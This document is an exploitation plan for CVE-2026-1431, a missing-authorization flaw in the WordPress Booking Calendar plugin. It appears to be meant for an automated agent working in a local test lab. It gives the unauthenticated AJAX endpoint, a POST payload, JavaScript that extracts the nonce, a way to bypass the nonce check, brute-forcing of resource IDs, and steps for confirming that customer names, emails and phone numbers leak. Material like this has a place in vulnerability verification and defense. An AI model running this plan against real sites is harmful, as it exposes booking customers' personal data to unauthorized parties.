Exploitation Research Plan: CVE-2026-1431 (Booking Calendar)

1. Vulnerability Summary

The Booking Calendar plugin (<= 10.14.13) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the function wpbc_ajax_WPBC_FLEXTIMELINE_NAV() is registered as an AJAX action accessible to unauthenticated users via wp_ajax_nopriv_WPBC_FLEXTIMELINE_NAV. The function fails to implement any current_user_can() capability checks. Consequently, an unauthenticated attacker can invoke this function to retrieve sensitive booking data, including customer names, email addresses, and phone numbers, which are typically displayed in the "Flex Timeline" view.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• HTTP Method: POST (typically used by WordPress AJAX)
• Action: WPBC_FLEXTIMELINE_NAV (Inferred from the function name wpbc_ajax_WPBC_FLEXTIMELINE_NAV)
• Parameters:
  • action: WPBC_FLEXTIMELINE_NAV
  • wpbc_nonce: (If required, see Nonce Strategy)
  • booking_type: (Inferred) The resource/calendar ID.
  • selected_dates: (Inferred) Date range for the timeline navigation.
• Authentication: None (Unauthenticated).
• Preconditions: At least one booking must exist in the system for data exposure to be demonstrable.

3. Code Flow

1. Entry Point: An unauthenticated user sends a request to admin-ajax.php with action=WPBC_FLEXTIMELINE_NAV.
2. Hook Registration: The plugin registers the action (likely in inc/js/biz_s.php or a similar core AJAX file):

   add_action( 'wp_ajax_WPBC_FLEXTIMELINE_NAV', 'wpbc_ajax_WPBC_FLEXTIMELINE_NAV' );
   add_action( 'wp_ajax_nopriv_WPBC_FLEXTIMELINE_NAV', 'wpbc_ajax_WPBC_FLEXTIMELINE_NAV' );
   

3. Vulnerable Function: wpbc_ajax_WPBC_FLEXTIMELINE_NAV() is executed.
4. Data Retrieval: The function parses date/navigation parameters and queries the database (via $wpdb or internal booking classes) for bookings falling within the requested range.
5. Sink: The function returns an HTML or JSON response containing the details of the bookings to populate the timeline UI. Because no capability check (e.g., current_user_can( 'manage_bookings' )) is present, the PII is sent to the requester.

4. Nonce Acquisition Strategy

Booking Calendar frequently uses nonces for AJAX actions. If wp_verify_nonce or check_ajax_referer is present in the vulnerable function, the following strategy should be used:

1. Identify the Localization: The plugin typically localizes AJAX parameters into a global JS object. Based on common versions, look for wpbc_global_values.
2. Identify Shortcode: The Flex Timeline is often rendered via a shortcode like [bookingtimeline].
3. Strategy:
   • Step 1: Create a public page containing the timeline shortcode:
     wp post create --post_type=page --post_status=publish --post_title="Timeline" --post_content='[bookingtimeline]'
   • Step 2: Navigate to the newly created page using browser_navigate.
   • Step 3: Use browser_eval to extract the nonce:

     // Search for potential nonce locations in WPBC
     window.wpbc_global_values?.wpbc_nonce || 
     window.wpbc_ajax_vars?.nonce || 
     document.querySelector('#wpbc_nonce')?.value
     

4. Bypass Check: If the code uses check_ajax_referer( 'wpbc-ajax-nonce', 'wpbc_nonce', false ) (with die=false) and fails to check the return value, the nonce can be omitted or randomized.

5. Exploitation Strategy

The exploit will attempt to navigate the "Flex Timeline" via the AJAX endpoint to leak booking details.

• Request URL: http://localhost:8080/wp-admin/admin-ajax.php
• Payload (POST Body):

  action=WPBC_FLEXTIMELINE_NAV
  &wpbc_nonce=[EXTRACTED_NONCE]
  &view_days=30
  &start_date=2025-01-01
  &resource_id=1
  

• Headers:
  • Content-Type: application/x-www-form-urlencoded
• Expected Response: A successful response will contain HTML table rows or a JSON array. Look for string patterns such as:
  • "email":"..."
  • "phone":"..."
  • "name":"..."
  • Or HTML tags containing email addresses (e.g., mailto:).

6. Test Data Setup

To verify the leak, we need existing booking data:

1. Create a Booking Resource:
   wp eval "$wpdb->insert($wpdb->prefix . 'bookingtypes', ['title' => 'Test Resource', 'users' => 1]);"
2. Create a Booking with PII:
   Generate a booking for "John Doe" with email victim@example.com and phone 555-1234. This can be done via wp eval by inserting into the wp_booking and wp_booking_details tables (table names may vary based on prefix).
   • Note: It is often easier to use the [bookingform] shortcode once to submit a real test booking through the frontend to ensure all relational tables are populated correctly.

7. Expected Results

• Success: The HTTP response body contains the string victim@example.com or 555-1234.
• Status Code: 200 OK.
• Data Structure: The data is likely formatted for a tooltip or a timeline cell, clearly showing customer identity information that should be restricted to administrators.

8. Verification Steps

1. Confirm Vulnerability: Check if the PII in the AJAX response matches the data created in Step 6.
2. Verify Unauthenticated Status: Ensure the http_request does not include any wordpress_logged_in_* cookies.
3. Database Check: Use WP-CLI to verify the record exists:
   wp db query "SELECT * FROM wp_booking_details WHERE email='victim@example.com'"

9. Alternative Approaches

• Action Name Variation: If WPBC_FLEXTIMELINE_NAV fails, search the source code for all wp_ajax_nopriv_ hooks using:
  grep -r "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/booking/
• Parameter Bruteforce: If the resource_id is unknown, loop through IDs 1-10.
• Date Range: If no results are returned, expand the start_date and view_days to cover a wider range (e.g., 365 days).